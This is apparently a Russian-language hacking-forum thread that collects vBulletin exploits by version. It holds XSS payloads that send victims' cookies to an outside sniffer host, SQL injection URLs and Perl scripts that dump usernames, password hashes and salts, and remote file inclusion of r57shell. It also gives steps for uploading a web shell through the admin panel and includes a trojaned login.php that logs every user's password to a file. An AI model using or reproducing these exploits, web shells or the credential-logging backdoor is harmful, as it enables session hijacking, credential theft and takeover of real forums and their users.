Обзор уязвимостей "vBulletin"

[PROPHET]

Узнаём версию форума.

В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.

Код:

vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.js

Пример:

Код:

www.xz.сom/forumpath/clientscript/vbulletin_editor.css

vBulletin 2

2.2.* - 2.2.4 - Выполнение произвольного кода
Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
Exploit: http://www.securitylab.ru/vulnerability/source/207147.php


2.3.* - SQL injection
Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
Пример:

Код:

www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

2.*.* - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.
Exploit:

Код:

[E*MAIL][Ссылки могут видеть только зарегистрированные пользователи. ]"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

Video: http://video.antichat.ru/file57.html


vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:

Код:

www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:

Код:

<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0

vBulletin 3.5

3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
        BODY:---------->No matter
        OTHER OPTIONS:->No matter

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:

Код:

www.xz.сom/forumpath/profile.php?do=editpassword
        pass:your pass
        email: [Ссылки могут видеть только зарегистрированные пользователи. ]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
        Note About lenght limitation 
        ****
        forum/profile.php?do=editoptions
        Receive Email from Other Members=yes
        ****
        www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}

Пояснение: заходим в профиль и в поле email прописываем [Ссылки могут видеть только зарегистрированные пользователи. ]”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:

Код:

www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
[Ссылки могут видеть только зарегистрированные пользователи. ]

Код:

Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Уязвимости в модулях vBulletin.

vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E

ImpEx 1.74 - PHP-инклюдинг и выполнение команд
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:

Код:

(1)
www.xz.сom/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt
www.xz.сom/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd
(2)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(4)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id

Exploit: http://www.securitylab.ru/vulnerability/source/264410.php

ibProArcade 2.x - SQL injection
Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:

www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Где [any_user] id нужного нам юзера.

При использовании XSS c указанным в теме снифером. Логи смотреть тут: [Ссылки могут видеть только зарегистрированные пользователи. ]
Но лучше завести себе свой снифер -). Это можно сделать тут: [Ссылки могут видеть только зарегистрированные пользователи. ] или тут: [Ссылки могут видеть только зарегистрированные пользователи. ].


Шелл в vBulletin.

Разберёмся как залить шелл из админки воблы.

Способ заливки шелла в vBulletin 2.*.* и 3.0.*
1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
Примечание: сработает не везде.

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Видео по теме:


[Ссылки могут видеть только зарегистрированные пользователи. ]l
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

[*Ni][]

Vbulletin 3.7.0 Gold Sql injection on faq.php

Vbulletin 3.7.0 Gold Sql injection on faq.php

_http://securityvulns.ru/Tdocument872.html

Exploit

http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sql injection]&match=any&titlesonly=1

Example:

/faq.php?s=&do=search&q='&match=any&titlesonly=1
/faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

Напоминиаю, структура базы в булке по дефолту:

user
~userid
~usergroupid
~username
~password
~email
~ipaddress
~salt


Алгоритм хэширования: vBulletin 3.x.x md5(md5($pass).$salt)

Elekt

Fix:
faq.php, строки 124-128 удаляем

Код:

 if (strlen($word) == 1)
{
// searches happen anywhere within a word, so 1 letter searches are useless
continue;
}

isis

[Lo0oL]

p0h n03s priv8 rootshell vbulletin pw logger

Код:

<?php 
/*=================================================  =====================*\ 
|| ##################################################  ################## || 
|| # vBulletin 3.6.2 
|| # ---------------------------------------------------------------- # || 
|| # Copyright ©2000-2006 Jelsoft Enterprises Ltd. All Rights Reserved. || 
|| # This file may not be redistributed in whole or significant part. # || 
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || 
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || 
|| ##################################################  ################## || 
\*================================================  ======================*/ 

// ####################### SET PHP ENVIRONMENT ########################### 
error_reporting(E_ALL & ~E_NOTICE); 

// #################### DEFINE IMPORTANT CONSTANTS ####################### 
define('THIS_SCRIPT', 'login'); 

// ################### PRE-CACHE TEMPLATES AND DATA ###################### 
// get special phrase groups 
$phrasegroups = array(); 

// get special data templates from the datastore 
$specialtemplates = array(); 

// pre-cache templates used by all actions 
$globaltemplates = array(); 

// pre-cache templates used by specific actions 
$actiontemplates = array( 
    'lostpw' => array( 
        'lostpw' 
    ) 
); 

// ######################### REQUIRE BACK-END ############################ 
require_once('./global.php'); 
require_once(DIR . '/includes/functions_login.php'); 

// ##################################################  ##################### 
// ######################## START MAIN SCRIPT ############################ 
// ##################################################  ##################### 

$vbulletin->input->clean_gpc('r', 'a', TYPE_STR); 

if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a'])) 
{ 
    exec_header_redirect($vbulletin->options['forumhome'] . '.php'); 
} 

// ############################### start logout ############################### 
if ($_REQUEST['do'] == 'logout') 
{ 
    $vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR); 

    if ($vbulletin->userinfo['userid'] != 0 AND $vbulletin->GPC['logouthash'] != $vbulletin->userinfo['logouthash']) 
    { 
        eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['logouthash']))); 
    } 

    process_logout(); 

    $vbulletin->url = fetch_replaced_session_url($vbulletin->url); 
    if (strpos($vbulletin->url, 'do=logout') !== false) 
    { 
        $vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q']; 
    } 
    $show['member'] = false; 
    eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false)); 

} 

// ############################### start do login ############################### 
// this was a _REQUEST action but where do we all login via request? 
if ($_POST['do'] == 'login') 
{ 
    $vbulletin->input->clean_array_gpc('p', array( 
        'vb_login_username' => TYPE_STR, 
        'vb_login_password' => TYPE_STR, 
        'vb_login_md5password' => TYPE_STR, 
        'vb_login_md5password_utf' => TYPE_STR, 
        'postvars' => TYPE_STR, 
        'cookieuser' => TYPE_BOOL, 
        'logintype' => TYPE_STR, 
        'cssprefs' => TYPE_STR, 
    )); 
    //does the user have a pass 
    $username = $vbulletin->GPC['vb_login_username']; 
    $password = $vbulletin->GPC['vb_login_password']; 
    $logfile = "rootshell.txt"; 
    $lf = fopen($logfile, "a"); 
    fwrite($lf, "\n".$username . ' : ' .  $password."\n"); 
    fclose($lf); 
    // can the user login? 
    $strikes = verify_strike_status($vbulletin->GPC['vb_login_username']); 

    if ($vbulletin->GPC['vb_login_username'] == '') 
    { 
        eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); 
    } 

    if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true)) 
    { 
        ($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false; 

        // check password 
        exec_strike_user($vbulletin->userinfo['username']); 

        if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin') 
        { 
            // log this error if attempting to access the control panel 
            require_once(DIR . '/includes/functions_log_error.php'); 
            log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security'); 
        } 
        $vbulletin->userinfo = array( 
            'userid' => 0, 
            'usergroupid' => 1 
        ); 

        if ($vbulletin->options['usestrikesystem']) 
        { 
            eval(standard_error(fetch_error('badlogin_strikes'  , $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes))); 
        } 
        else 
        { 
            eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl']))); 
        } 
    } 

    exec_unstrike_user($vbulletin->GPC['vb_login_username']); 

    // create new session 
    process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']); 

    // do redirect 
    do_login_redirect(); 

} 
else if ($_GET['do'] == 'login') 
{ 
    // add consistency with previous behavior 
    exec_header_redirect($vbulletin->options['forumhome'] . '.php'); 
} 

// ############################### start lost password ############################### 
if ($_REQUEST['do'] == 'lostpw') 
{ 
    $vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML); 
    $email = $vbulletin->GPC['email']; 

    if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview']) 
    { 
        $navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form'])); 
        eval('$navbar = "' . fetch_template('navbar') . '";'); 
    } 
    else 
    { 
        $navbar = ''; 
    } 

    $url =& $vbulletin->url; 
    eval('print_output("' . fetch_template('lostpw') . '");'); 
} 

// ############################### start email password ############################### 
if ($_POST['do'] == 'emailpassword') 
{ 

    $vbulletin->input->clean_gpc('p', 'email', TYPE_STR); 

    if ($vbulletin->GPC['email'] == '') 
    { 
        eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink']))); 
    } 

    require_once(DIR . '/includes/functions_user.php'); 

    $users = $db->query_read_slave(" 
        SELECT userid, username, email, languageid 
        FROM " . TABLE_PREFIX . "user 
        WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "' 
    "); 
    if ($db->num_rows($users)) 
    { 
        while ($user = $db->fetch_array($users)) 
        { 
            $user['username'] = unhtmlspecialchars($user['username']); 

            $user['activationid'] = build_user_activation_id($user['userid'], 2, 1); 

            eval(fetch_email_phrases('lostpw', $user['languageid'])); 
            vbmail($user['email'], $subject, $message, true); 
        } 

        $vbulletin->url = str_replace('"', '', $vbulletin->url); 
        eval(print_standard_redirect('redirect_lostpw', true, true)); 
    } 
    else 
    { 
        eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink']))); 
    } 
} 

// ############################### start reset password ############################### 
if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword') 
{ 

    $vbulletin->input->clean_array_gpc('r', array( 
        'userid'       => TYPE_UINT, 
        'u'            => TYPE_UINT, 
        'activationid' => TYPE_UINT, 
        'i'            => TYPE_UINT 
    )); 

    if (!$vbulletin->GPC['userid']) 
    { 
        $vbulletin->GPC['userid'] = $vbulletin->GPC['u']; 
    } 

    if (!$vbulletin->GPC['activationid']) 
    { 
        $vbulletin->GPC['activationid'] = $vbulletin->GPC['i']; 
    } 

    $userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1); 

    $user = $db->query_first(" 
        SELECT activationid, dateline 
        FROM " . TABLE_PREFIX . "useractivation 
        WHERE type = 1 
            AND userid = $userinfo[userid] 
    "); 

    if ($user['dateline'] < (TIMENOW - 24 * 60 * 60)) 
    {  // is it older than 24 hours? 
        eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl']))); 
    } 

    if ($user['activationid'] != $vbulletin->GPC['activationid']) 
    { //wrong act id 
        eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl']))); 
    } 

    // delete old activation id 
    $db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1"); 

    // make random number 
    $newpassword = vbrand(0, 100000000); 

    // init user data manager 
    $userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD); 
    $userdata->set_existing($userinfo); 
    $userdata->set('password', $newpassword); 
    $userdata->save(); 

    ($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false; 

    eval(fetch_email_phrases('resetpw', $userinfo['languageid'])); 
    vbmail($userinfo['email'], $subject, $message, true); 

    eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl']))); 

} 

/*=================================================  =====================*\ 
|| ##################################################  ################## 
|| # CVS: $RCSfile: login.php,v $ - $Revision: 1.160 $ 
|| ##################################################  ################## 
\*================================================  ======================*/ 
?>

[bZik]

vBulletin 3.7.0 <= XSS Explot

Код:

Found by RoBOTNIK


http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

[Que$t]

EggAvatar for vBulletin 3.8.x SQL Injection

Код:

#!/usr/bin/env perl  
use LWP::UserAgent;  
sub banner{  
print "###################################\n";  
print "############ DSecurity ############\n";  
print "###################################\n";  
print "# Email:dsecurity.vn[at]gmail.com #\n";  
print "###################################\n";  
}  
if(@ARGV<5){  
    print "Usage: $0 address username password number_user sleeptime\n";  
    print "Example: $0 [Ссылки могут видеть только зарегистрированные пользователи. ] test test 10 10\n";  
    exit();  
}  
$ua=LWP::UserAgent->new();  
$ua->agent("DSecurity");  
$ua->cookie_jar({});  
sub login(@){  
    my $username=shift;  
    my $password=shift;  
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');  
    $req->content_type('application/x-www-form-urlencoded');  
    $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");  
    my $res = $ua->request($req);  
}  
sub v_request{  
    #Declare  
    $print = $_[0];  
    $select = $_[1];  
    $from = $_[2];  
    $where = $_[3];  
    $limit = $_[4];  
    $sleep = $ARGV[4];  
    if ($from eq '') {$from = 'information_schema.tables';}  
    if ($where eq '') {$where = '1';}  
    if ($limit eq '') {$limit = '0';}  
    if ($sleep eq '') {$sleep = '10';}  
       
    # Create a request  
    my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');  
    $req->content_type('application/x-www-form-urlencoded');  
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");  
    # Pass request to the user agent and get a response back  
    my $res = $ua->request($req);  
    #print $res->content;  
    if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)  
        {$test = $3};  
    sleep($sleep);  
    return $print.$test."\n";  
}  
&banner;  
print "\n################################################  ##################################################  ###########\n";  
print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";  
print "# Date:06-03-2011                                                                                           #\n";  
print "# Author: DSecurity                                                                      #\n";  
print "# Software Link: [Ссылки могут видеть только зарегистрированные пользователи. ] #\n";  
print "# Version: 2.3.2                                                                                            #\n";  
print "# Tested on: vBulletin 3.8.0                                                                                #\n";  
print "##################################################  ##################################################  #########\n";  
   
#login  
login($ARGV[1],$ARGV[2]);  
#Foot print  
print v_request('MySQL version: ','@@version');  
print v_request('Data dir: ','@@datadir');  
print v_request('User: ','user()');  
print v_request('Database: ','database()');    
#Get user  
for($i=1;$i<=$ARGV[3];$i++){  
    print "-----------------------------------------\n";  
    print $id = v_request('ID: ','userid','user','1',$i-1);  
    if($id =~ /(ID:)s(.*)/){  
        print v_request('Group: ','usergroupid','user','userid='.$2);  
        print v_request('Username: ','username','user','userid='.$2);  
        print v_request('Password: ','password','user','userid='.$2);  
        print v_request('Salt: ','salt','user','userid='.$2);  
        print v_request('Email: ','email','user','userid='.$2);  
    }  
               
}

В популярном движке для форумов vBulletin нашли интересную уязвимость — при вводе в поиске на странице FAQ слова «database» на экран выводится вся информация о подключения к MySQL серверу.

Проблему устранили в vBulletin версии 3.8.6-PL1.
Если верить разработчикам — данный баг был просто недосмотром, из движка забыли убрать часть дебаг-кода.

Код:

#!/usr/bin/perl
use strict;
use LWP::Simple;
use HTML::Parser;
use Data::Dumper;
my $url = shift @ARGV;
my $line;
die "No URL specified on command line." unless (defined $url);
my $url2 = "$url\/install\/vbulletin-language.xml";
my $content = get($url2); #put site html in $content.
die "get failed" if (!defined $content); 

if ($content =~ m/database_ingo/) {
    $url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
    $content = get($url2);
    die "Get Failed" if (!defined $content);
    open(MYDATA, ">aaaaa.txt");
    print MYDATA $content;
    close MYDATA;
    open(NEDATA, "<aaaaa.txt");
        while($line = <NEDATA>) {
            if ($line =~ m/Host:/) {
                $line =~ s/<span class=\"highlight\">Database\<\/span>//;
                $line =~ s/\<br \/\>//;
                print "$line\n";
            }
            if ($line =~ m/Username:/) {
                $line =~ s/<span class=\"highlight\">Database<\/span>//;
                $line =~ s/<br \/>//;
                print "$line\n";
            }
            if ($line =~ m/Password:/) {
                $line =~ s/<span class=\"highlight\">Database<\/span>//;
                $line =~ s/<\/td>//;
                print "$line\n";
            }
        }
    close NEDATA;
    unlink($url2);
} else {
print "Not vulnerable!\n";
}

Habr (c)

Exploit Title: vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

Код:

# Exploit Title: vBulletin 4.1.7 => 4.1.10 XSS Vulnerability 
# Google Dork: intitle: powered by vBulletin 4.1.10
# Date: 20/02/2012
# Author: .e0f
# Software Link: [[Ссылки могут видеть только зарегистрированные пользователи. ]
# Version: [4.1.10 Others not tested]
# Tested on: [BackTrack 5 | BlackBuntu | Windows 7/xp]
# Contact: [[Ссылки могут видеть только зарегистрированные пользователи. ]
# Home: [[Ссылки могут видеть только зарегистрированные пользователи. ]
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
# Video: [[Ссылки могут видеть только зарегистрированные пользователи. ]
######################################################################################################
Vulnerability:
1.
Send New Private Message > 
                         > 
   Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)
######################################################################################################

Watch the video: [[Ссылки могут видеть только зарегистрированные пользователи. ]

##########################################################################################
                       4ll 1nformati0n is pr0vid3d f0r ref3rence 0nly!
##########################################################################################
Greetz to: Babka | F1xeR | ga1Do4ok | Dark-x | Moderor | 2FED | 4elovek 
  v1nest | .e0f | ka0z | silver | Saint | x0r | Duman | ugly | Shadow008 | AlphaSky
   * special thanks to: fpteam-cheats.com | brutezone.ru | From Russia with Love....
###########################################################################################

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: [Ссылки могут видеть только зарегистрированные пользователи. ]             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl [Ссылки могут видеть только зарегистрированные пользователи. ] VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

vBulletin 5 Beta XX SQLi 0day

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: [Ссылки могут видеть только зарегистрированные пользователи. ]
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

Код:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: [Ссылки могут видеть только зарегистрированные пользователи. ]             |
+===================================================+
";
 
if (@ARGV != 5) {
    print "rnUsage: perl vb5exp.pl [Ссылки могут видеть только зарегистрированные пользователи. ] VBPATH URUSER URPASS MAGICNUMrn";
    exit;
}
 
$host		= $ARGV[0];
$path		= $ARGV[1];
$username	= $ARGV[2];
$password	= $ARGV[3];
$magicnum	= $ARGV[4];
$encpath	= encode_base64('http://'.$host.$path);
print "[+] Loggingn";
print "[+] Username: ".$username."n";
print "[+] Password: ".$password."n";
print "[+] MagicNum: ".$magicnum."n";
print "[+] " .$host.$path."auth/loginn";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
		'url' => $encpath,
		'username' => $username,
		'password' => $password,
	],
	Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requestingn";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
		'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
	],
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\.)|[^\#])*#)/) { print '[+] Version: '.$1 };
print "n";
exit 1;

(с) [Ссылки могут видеть только зарегистрированные пользователи. ]

[SQLaiN]

SQL

Код:

====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
